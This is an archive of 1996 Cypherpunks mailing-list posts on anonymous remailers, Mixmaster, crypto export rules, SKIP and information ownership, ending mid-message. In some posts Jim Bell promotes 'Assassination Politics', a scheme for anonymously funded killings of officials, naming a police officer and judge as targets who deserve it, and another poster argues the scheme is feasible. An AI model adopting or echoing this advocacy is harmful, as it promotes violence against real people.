From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 15:55:25 +0800
To: loki@infonex.com
Subject: Re: MixMaster fair use
Message-ID: <01I56JWNJ2OG8Y4ZV3@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@infonex.com" 26-MAY-1996 16:50:16.67

>I think the current license is fine for most purposes. I am not some
>monolithic corporation. If someone needs a license with special terms, my
>email address is public knowledge and I am generally very accommodating.

	You have a point. Speaking of this issue, as I understand it the
RSA patents only apply in the US; their copyrights apply outside the US, but
there are replacement "parts" for their library for outside of the US which
don't run into those copyrights. What happens if I telnet into an account
outside the US and download into that account, from an outside of the US
distribution point, a copy of Mixmaster with the substitute ones, then start
using it for profit (an ecash-accepting-program or whatever)? I assume that I'd
get around ITAR this way - I'm not exporting it, I didn't even bring it into
the US to bring it back out - but can RSA sue me/my company (I'd do it through
a company) for patent infringement?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 27 May 1996 16:00:57 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <9605270508.AA07185@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 26 May 96 at 20:11, jim bell wrote:

>At 09:39 PM 5/26/96 -0400, Subir Grewal wrote:

> >  Marx was not the first to poitn out that institutions influence
> >our actions, that we are products of our times, that the choices we
> >face are as much determined by our own preferences as they are by
> >the world around us.  AP will create an environment where, I
> >believe, an undesireable set of options will be presented to each
> >of us.  This is the "outcome" argument, i.e. undesireable ends, the
> >means themselves are reprehensible.


> I wish I understood what you just said...

ROTFL!

JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 I reserve the right to post publicly any private e-mail sent to me.
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 27 May 1996 17:54:12 +0800
To: Subir Grewal <grewals@acf2.NYU.EDU>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <9605270506.AA07168@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 27 May 96 at 0:22, Subir Grewal wrote:

> Real world anonymity is difficult to buy, and actions such as murder
> (or what you'd like to call "self-defense") take place in the real
> world.

But that is the principle by which AP operates.  That *is* the whole 
point that seems to miss you: encryption technologies makes that 
perfectly feasible.  I agree that it is a novelty in the history of 
humankind...

> I'd expect a realization of AP to promote a great backlash from a
> variety of quarters.  Such methods, besides being unethical, are
> probably going to be used as fodder to infringe the liberties of
> others.

During the transition period, definitely.

>In other words, a witch-hunt will result, AP advocates
> marginalized (if they are discovered).  My original reservations, on
> the grounds of unjust means still stand, maybe we can return to this
> discussion sometime later.

Why, is it becoming too hot?  Are you tempted to send the cops at Jim 
Bell's place?


> "Religious" fanatics have great appeal, I don't think even AP will
> make them "go away", the odds are they'll become martyrs.  And we
> know where that takes us.

Against *whom* will they retaliate?  And more down to earth, I bet
that in the advent of AP becoming operationnal, their leaders will
go down even faster than our own.


> I wasn't talking about the legal system in an AP world, but the idea
> that AP is justice in some sense.

"In a competition between a pickpocket and a murderer, hte murderer 
always win"
		-Ayn Rand

> Incidentally, a purely civil law
> court is what I'd like as well, and competing courts and arbitration
> systems sound good to me.

Since you said yourself that the actual govt will *never* relinquish 
power, I find that statement a bit of a contradiction.


JFA
PLEASE NOTE: THIS POST DOES NOT MEAN THAT I ENDORSE MR. BELL'S
SYSTEM.  MY RATIONNAL CONCLUSIONS ABOUT IT'S INTERNAL MECHANICS
AND IT'S INTRINSIC LOGICS DOES NOT MEAN THAT I LIKE NOR ENDORSE
THE SYSTEM. I SIMPLY CONCLUDED THAT IT IS IMPOSSIBLE TO PREVENT
THE SYSTEM FROM BEING IMPLEMENTED.  IMO, IT IS UNAVOIDABLE.

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 27 May 1996 11:27:51 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605262356.BAA05794@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


We are pleased to announce the opening of the Czarevna Tatjana Mixmaster
Remailer at tat@mindport.net.

At present the remailer is configured to accept type2 messages only.

Questions or comments should be directed to tatjana@mindport.net.

Please note that some debugging is still in the works.  An announcement of
our complete confidence in the remailer's full and proper operation will
be made presently.

All official announcements will be signed with the following PGP key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBtAzGo67oAAAEDAK/Pr9W3uySr/cb8cxHIEu0rfTGVaulmtFZ5fVN0M+fg9/AA
1ZM1PoJR9f8Oxjmg1+UG69SFLxgJSAZAQDwJjOAfwQG47n08eDjeNnZSezuZEC1L
ZIj7KCG7mCX4fe8+7QAFEbQsQ3phcmV2bmEgVGF0amFuYSBSZW1haWxlciA8dGF0
QG1pbmRwb3J0Lm5ldD4=
=4ukd
- -----END PGP PUBLIC KEY BLOCK-----


Mixmaster key information follows:


czarevna tat@mindport.net 0bd7631f6a2ca8c6a16f3e85a7526f43 2.0.3

- -----Begin Mix Key-----
0bd7631f6a2ca8c6a16f3e85a7526f43
258
AATLWxuW8j90eNaVFGVBMV5rCWT49MOoPTZXpHGb
vGbTLUe/K60+bMP6+nIuWU3dbIQORa7ZI0emwRRr
EWXVhCZnnDnf+G3O2Vjqw8Py9JoXJufSYig1bV0K
kuN4p87Cu6FlWdQFT19fI28B42b0pZYgyVuB9ns0
3VARqmCl5LHziwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMajtQbuYJfh97z7tAQGRGwL/fm9VqOsTxtb61aZi5yq6YNzl05mZu6QU
uzsIXz9LPd2J/iWYDx5CKASytDeb9YOY6HxYEec7sLFArjUu2999UcQRGp8uoFmT
9YKiRrwrc4Nr82E2q3LMZzVHgt403Z+U
=SXwM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 27 May 1996 17:21:52 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <199605251737.KAA26055@mail.pacifier.com>
Message-ID: <Pine.SUN.3.93.960527021103.2291B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 May 1996, jim bell wrote:

> At 12:10 AM 5/25/96 EDT, E. ALLEN SMITH wrote:
> >From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 22:52:03.64

> >	Why the first in chain? If the anti-traffic-analysis provisions are
> >working properly, it should be impossible to prove that a given first remailer
> >was the first remailer for any particular message. I had thought that even
> >civil courts required that you be the person who committed some act, not the
> >person who _might_ have committed some act. Otherwise, all the remailers are
> >in danger. This is even if someone tries an entrapment by sending through some
> >illegal material - if the courts accept that they should be allowed to do this,
> >then all the remailers they chained are going to be hit.
> 
> Likewise, I don't see why the first address in the chain is vulnerable, as 
> long as the message subsequently passes through at least one trustworthy 
> remailer, and probably  a temporary output address.  

I repeat, all it takes is one person to send through only one remailer
(perhaps even a Co$ plant) and the first in chain remailer is toasted.

Think before you type please.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 27 May 1996 17:09:21 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <199605270636.XAA02836@mail.pacifier.com>
Message-ID: <Pine.SUN.3.93.960527023726.2291D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 May 1996, jim bell wrote:

> At 02:12 AM 5/27/96 -0400, Black Unicorn wrote:
> >On Sat, 25 May 1996, jim bell wrote:

> >> Likewise, I don't see why the first address in the chain is vulnerable, as 
> >> long as the message subsequently passes through at least one trustworthy 
> >> remailer, and probably  a temporary output address.  
> >
> >I repeat, all it takes is one person to send through only one remailer
> >(perhaps even a Co$ plant) and the first in chain remailer is toasted.
> >
> >Think before you type please.
> 
> You should take your own advice.  The mere fact that the first link in
> the chain is "known" doesn't mean that it is provably involved.  Without
> a substantial amount of bugging that the COS hasn't the resources to do,
> there is a big difference between them _believing_ that a given message
> originated there, and being able to prove it in court.  And notice my
> caveat:  "As long as the message subsequently passes through at least
> one trustworthy remailer, and probably a temporary output address."

The above is incorrect for several reasons and is a poor dodge to boot.
Take it to private mail.

> 
> Jim Bell
> jimbell@pacifier.com
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Mon, 27 May 1996 18:12:08 +0800
To: cypherpunks@toad.com
Subject: Sun pushing SKIP for intranets and java
Message-ID: <199605270739.CAA11092@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sun is pushing SKIP for intranets and encrypting/verifying java applets.
Bay Networks, BBN, Premenos Technology, Milkyway Networks, and VPNet
have signed on.

See http://www.cnet.com/ for more info.  I took a quick look at Sun's site
and didn't see anything.


                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even 
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Mon, 27 May 1996 22:37:39 +0800
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Updated type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960527063520.10586A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I just updated the type2.list/pubring.mix combination on
jpunix.com to reflect the opening of the czarevna type-II remailer. The
lists are available by anonymous FTP from ftp.jpunix.com as well as by Web
from www.jpunix.com

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMamUHlOTpEThrthvAQHGFAP+IAE4NCXH20XuhpYoEZHJYMP4oAkiFxl7
TwkNWcbCC+GJVddjQVoORvLtNNwgeA6RxkJR+sAnwB3NbtynBi1NVymKEUj6FO4W
4Q5i/0BaRbYpMdqpgmYwCbvrFtG3IJh715o9oGG9ylP3f89vDMN9CBw0iSMhJDva
DeIyKxaFseA=
=RK3J
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 28 May 1996 01:33:09 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199605271350.GAA22800@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 27 May 96 6:45:11 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
portal   hfinney@shell.portal.com         ####+##*#-+#     5:49  99.97%
penet    anon@anon.penet.fi               -_______-.   51:37:29  99.86%
exon     remailer@remailer.nl.com         ****** +***#     2:57  99.83%
replay   remailer@replay.com              *+***+ *****     5:42  99.60%
alumni   hal@alumni.caltech.edu           ##* +  *#-+#     5:29  99.58%
lead     mix@zifi.genetics.utah.edu       ++++++ +++++    37:43  99.47%
vegas    remailer@vegas.gateway.com       -*#**+*** *      7:27  99.28%
mix      mixmaster@remail.obscura.com     ++-+++ .--++  5:21:48  99.11%
haystack haystack@holy.cow.net            *####- +*-*#    33:43  99.01%
flame    remailer@flame.alias.net         ++++++ ----   1:31:02  98.86%
amnesia  amnesia@chardos.connix.com       ---+-- ----   3:18:01  98.65%
ecafe    cpunk@remail.ecafe.org           -##### ####+     3:20  97.12%
c2       remail@c2.org                    -++-** +- ++    45:44  96.90%
alpha    alias@alpha.c2.org               -++-++ *+ ++    50:38  96.87%
extropia remail@miron.vip.best.com          ..-.-----  10:35:00  92.95%
treehole remailer@mockingbird.alias.net   --+---- -     3:58:26  85.32%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 28 May 1996 03:31:58 +0800
To: cypherpunks@toad.com
Subject: FW: "Scannist" arrested
Message-ID: <199605271553.IAA17167@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


If there is any residual doubt as to why I'm proposing an "extreme" solution 
to government, "Assassination Politics," I think the following is just 
another good reason to do so.  I contend that people like that cop and the 
judge would be FAR more careful in how they do their job if they were aware 
they might be angering well over a half a million hams.  This kind of abuse 
will happen as long as there is no mechanism to prevent it.

> ----------
>From: owner-scan-l
>To: Multiple recipients of list SCAN-L
>Subject: "Scannist" arrested
>Date: Sunday, May 26, 1996 1:47PM
>
>Two sad things:
>
>1) Cops in some parts of Kentucky can't tell a scanner
>when they see one (or don't see one, in this case), and
>
>2) the radio in question IS INCPABLE OF BEING MODIFIED TO
>RECEIVE OUT OF BAND!!!!  Sheesh.
>
>Peter
>
>Excerpted from:
>
>The ARRL Letter
>Electronic Update
>May 24, 1996
>
><...>
>
>
>TEEN HAM ARRESTED ON SCANNER CHARGES
>
>Greg Godsey, KF4BDY, a 16-year-old ham from Hopkinsville, Kentucky, was
>arrested May 11 by local police who charged him with carrying a scanner that
>could receive police radio frequencies. His Radio Shack HTX-202 2-meter
>transceiver was confiscated. At a court appearance May 14, he was bound over
>for trial on June 4. The judge reportedly didn't hear any arguments
>concerning whether the law was broken, possibly because the arresting
>officer wasn't present.
>
>According to reports, Greg, the ARES EC for Christian County, Kentucky, and
>a ham since last summer, was detained by Hopkinsville Police. The officer
>indicated that when he arrived, Greg "was talking on a radio that is capable
>of receiving police frequencies. I verified this by keying my radio, which
>broke the squelch on [Greg's] radio."
>
>Greg denies the charges and says his radio has not been modified and cannot
>receive or transmit outside of the 2-meter band. He has sought advice from
>the ARRL in resolving the matter. ARRL Regulatory Information Branch
>Supervisor Norman Bliss, WA1CCQ, says the Kentucky law exempts equipment
>possessed by a licensed Amateur Radio operator that is capable of receiving
>police frequencies.
>
><...>
>
>===========================================================
>Material from The ARRL Letter may be reproduced in whole or in part, in any
>form, including photoreproduction and electronic databanks, provided that
>credit is given to The ARRL Letter and The American Radio Relay League.
>
>
>To subscribe to the email distribution list for the ARRL Letter, send
>a message to listserv@netcom.com with the body (subject is ignored)
>
>subscribe letter-list
>
>To unsubscribe,
>
>unsubscribe letter-list
>
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 28 May 1996 01:36:55 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Philosophy of information ownership [ Re: Children's Privacy Act ]
In-Reply-To: <2.2.32.19960525115008.006ed084@mail.aracnet.com>
Message-ID: <31A9BB1D.7BE5@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Baugh wrote: 
> At 11:34 PM 5/24/96 -0700, tcmay@got.net (Timothy C. May) wrote:
> 
> >If I have compiled records, dossiers, etc., as I most assuredly have (got
> >to fill up those MO disks with something), this is "my" information. Mine
> >in the sense that others can't dictate to me what I do with it.
> 
> I don't see that this is necessarily true for information any more than it
> is property. Property can be bought, sold, traded, given away, made...but it
> can also be stolen. 

I don't think this comparison is valid at all.

> Just as I have a right to complain if you walk off with my couch without 
> my permission, so if you walk off with data on my blood chemistry or 
> credit history without my permission.

What if I just *see* your couch, and then back in my garage I use my
couch replicator to make a couch just like yours, complete with fuzzballs
and loose change between the cushions?  Now I have your couch, in a sense.
Are you still upset?

When I walked off with your blood chemistry data, did you lose the use
of it for your future purposes?

And try this:  I now am in posession of some information about you, 
specifically:

* You subscribe to cypherpunks and are aware of (and possibly a sympathizer
towards) a variety of wacko political ideas;

* You believe in "strong" ownership rights over information (something 
handy if I'm on some legislative warpath and need supporters)

What do you propose as to the obligations I should have to you as regards
the disposition of this information?  For example, what if I receive a 
phone call from somebody interested in any e-mail addresses of people I
know who might be interested in supporting the new on-line copyright bill?
I just might decide to sell him your address.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 28 May 1996 02:44:42 +0800
To: Lance Cottrell <loki@infonex.com>
Subject: Re: Quickremail v1.0b
In-Reply-To: <adceed350b0210044f26@[206.170.115.3]>
Message-ID: <Pine.LNX.3.93.960527112644.133B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 26 May 1996, Lance Cottrell wrote:

> Which remailers does it install?

Mixmaster, and it gives a choice of either installing the Freedom remailer or
the remailer code written by Matt Ghio.  It also has support for reorder
scripts, but I haven't debugged that part yet.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBManL0LZc+sv5siulAQGZnAQAqS39haDGgJt/2WrdyKH1GjyK4mwviM+t
BJ8ssA9SIJ/QuruvZhTE8IaUeRqdTrqAFNWM6fmgZ0Idlm55DEoBmgdH88fznoao
SdWUAd/zqBJaGX1SCcXcHLU2V1pCAs8hZpmvSjsd343b/pGqCGmXwS/x915s+ame
IfHyOPtO3Hs=
=DviA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.nyu.edu>
Date: Tue, 28 May 1996 03:21:58 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <9605270506.AA07168@cti02.citenet.net>
Message-ID: <Pine.ULT.3.92.960527120502.28338A-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 May 1996, Jean-Francois Avon wrote:

:Since you said yourself that the actual govt will *never* relinquish
:power, I find that statement a bit of a contradiction.

Asking someone to "relinquish" is not the only manner in which a change is
effected.  BTW, I have no problem with your proposals for voluntary
insurance, health etc. schemes.  In fact a minimalist state assumes all of
that.  You might want to read up on what classical liberalism is andd what
a minimalist state implies before you spout Rand.

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5
A fool must now and then be right by chance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Mon, 27 May 1996 13:45:13 +0800
To: cypherpunks@toad.com
Subject: cryptlib debugging for Win95, WinNT
Message-ID: <199605270148.NAA08392@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


In order for the RSA encryption functions in cryptlib
(ftp://garbo.uwasa.fi/pc/security/crypl110.zip, but that one's without
the RSA stuff for reasons which will become apparent) to work, I need to
find someone to test the Win95 and WinNT random-number generation code,
which calls various Win32 statistics-monitoring functions to seed its
internal random number pool.  I've written most of the code, but since some 
of the documentation for the API's is pretty dodgy, it'll need a bit of
debugging and testing to get going.  Is there anyone here who can help
with this?  I estimate that it's an hour or so of work for the Win95 side
(which has Toolhelp32), and maybe half a day for NT (which has the incredibly
complex registry-walking system and semi-documented network statistics
gathering).  There are two files to compile, with a total size of about 20K.
I can't do it myself since I don't have easy access to any sort of Win32 
system.

Oh yes, this part of the code has nothing to do with crypto, so there are no
problems with US people doing it.

Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Mon, 27 May 1996 23:21:43 +0800
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: Sun pushing SKIP for intranets and java
In-Reply-To: <199605270739.CAA11092@snoopy.vetmed.auburn.edu>
Message-ID: <Pine.GSO.3.93.960527152808.26089F-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


 Mon, 27 May 1996, Frank Stuart kirjutas:

> Sun is pushing SKIP for intranets and encrypting/verifying java applets.
> Bay Networks, BBN, Premenos Technology, Milkyway Networks, and VPNet
> have signed on.

You can find more about SKIP from http://www.incog.com/ or
http://skip.incog.com/ which are servers for Sun Internet Commerce Group.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Jean Camp" <lc2m+@andrew.cmu.edu>
Date: Tue, 28 May 1996 07:57:59 +0800
To: cypherpunks@toad.com
Subject: Re: The Anti-Briefing...
In-Reply-To: <199605241937.PAA08694@pair>
Message-ID: <wleUj=i00iWW82aSFg@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from espam: 24-May-96 Re: The Anti-Briefing... by
e$pam@intertrader.com 
> We can all think of repressive steps which undeniably will save the lives
>  of some children, babies, old people, mothers, etc.
>  
>  Banning alcohol, banning smoking, banning sex outside of marriage....
>  

I would like to point out that these things will almost certainly not
save the lives of mothers and babies and were sure as fuck not intented
to protect women & children.  Clue in, in places where all sex outside
marraige is illegal being a victim of rape is a crime.  It is rapist
protection.   The banning of alcohol was used to remove children from
the homes of 'unfit' immigrant families.  It was about 'culture wars' &
racial purity.  Drug test are proposed to refuse people benefits (sorry
your mom's a pothead kid -- so now your going to be HOMELESS!)  Then
when this kind of propaganda works, women end up fighting idiots who buy
_into_ the idea that _we_ caused the problem and thereby preventing more
effective action. 

You do not need to vomit DoD crap about children.  You aren't helping
anyone but the DoD. Get a half a clue -- if they wanted to protect
children they could support funds for housing, food, and health care for
families. 

Five kids a day die from violence from the hands of their parents.  The
infant mortality rate in DC is twice what it is in Havana. I'm sure
those kids are really happy that they do not have to worry about
cryptography or seeing naked people on the  Internet.  Yeah, these are
the important issue today for America's children -- NOT.

I hope that you do not seriously buy that crap about prohibition of
crypto (or porn or pot, etc) being about "protecting children."  All
that line does is separate otherwise effective advocates of freedom - - 
if you're bitching about women & children you're not fighting the NSA
and it will keep you from working effectively with anyone in the
categories
>old people, mothers, etc..
and other not entirely trivial political groups. 


Jean






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 28 May 1996 10:59:28 +0800
To: "L. Jean Camp" <cypherpunks@toad.com
Subject: Noise, was The Anti-Briefing...
Message-ID: <199605272325.QAA06412@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:08 PM 5/27/96 -0400, L. Jean Camp wrote:
> Five kids a day die from violence from the hands of their parents. 

Not so:  I believe this figure is "parent or guardian".  Nearly all
kids are killed by stepfathers, and some by step mothers.  Murders of
children by their natural parents are extraordinarily rare.

A stepfather or stepmother has even more incentive, and 
considerably more opportunity, to murder her spouses children 
than she has to murder her spouses lover.


> The
> infant mortality rate in DC is twice what it is in Havana.

Nobody, least of all Castro, knows what the infant mortality
rate in Cuba is, since in Cuba, truth is a crime.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 May 1996 08:13:44 +0800
To: gbroiles@netbox.com
Subject: Re: Remailers & liability
Message-ID: <01I57HT7DIPS8Y503M@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"gbroiles@netbox.com"  "Greg Broiles" 26-MAY-1996 19:38:38.36

>For what it's worth, I'm still planning to run a remailer again when I get
>settled down somewhere. (I don't think remailers do much good where the
